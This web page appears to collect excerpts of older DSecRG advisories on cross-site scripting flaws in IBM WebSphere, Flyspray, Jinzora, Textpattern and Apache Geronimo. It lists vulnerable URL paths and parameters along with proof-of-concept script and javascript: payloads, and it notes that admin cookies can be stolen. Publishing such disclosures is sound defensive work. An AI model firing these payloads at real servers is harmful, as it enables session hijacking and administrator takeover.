New User, Welcome!     Login

script>alert('DSecRG

[DSECRG-09-013] IBM WebSphere Application Server 7.0 Multiple XSS Vulnerabilities

Attacker can inject XSS in URL string.

Example:

http://[server]/ibm/console/<script>alert('DSecRG_XSS')</script>
http://[server]/ibm/console/<script>alert('DSecRG_XSS')</script>.jsp

Using this vulnerability attacker can steal admin's cookie and then authentificate as administrator. 

2. PlantsByWebSphere Sample multiple XSS vulnerabilities.

[DSECRG-08-017] Flyspray 0.9.9.4 Multiple Security Vulnerabilities

POST parameters "tasks_perpage", "time_zone", "account_enabled", "notify_own".

Example:

tasks_perpage = <script>alert('DSecRG XSS')</script>
time_zone = <img src="javascript:alert('DSecRG XSS')">


1.2 Vulnerabilities found in script index.php?do=admin&area=newproject.

[DSECRG-08-016] Jinzora 2.7.5 Multiple XSS

GET parameters "frontend", "set_frontend", "jz_path", "theme", "set_theme".

Example:

http://[server]/[installdir]/index.php?frontend=<IMG SRC="javascript:alert('DSecRG XSS')">


1.2 Linked XSS vulnerabilities found in ajax_request.php.

GET parameters "frontend", "theme", "language".

[DSECRG-08-008] Textpattern 4.0.5 Multiple Security Vulnerabilities

2. Linked XSS vulnerability found in /textpattern/setup/index.php, attacker can inject XSS in URL string.


Example:

http://[server]/[installdir]/textpattern/setup/index.php/"><script>alert('DSecRG XSS')</script>

--------------------------------------------------------------------------------------------


3. XSS in POST

[DSECRG-09-019] Apache Geronimo - XSS vulnerabilities.txt

Attacker can inject XSS in URL string.

Example:

http://[server]/console/portal/"><script>alert('DSecRG XSS')</script><!--


2. Multiple Stored XSS vulnerabilities found in script 

/console/portal/Server/Monitoring


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!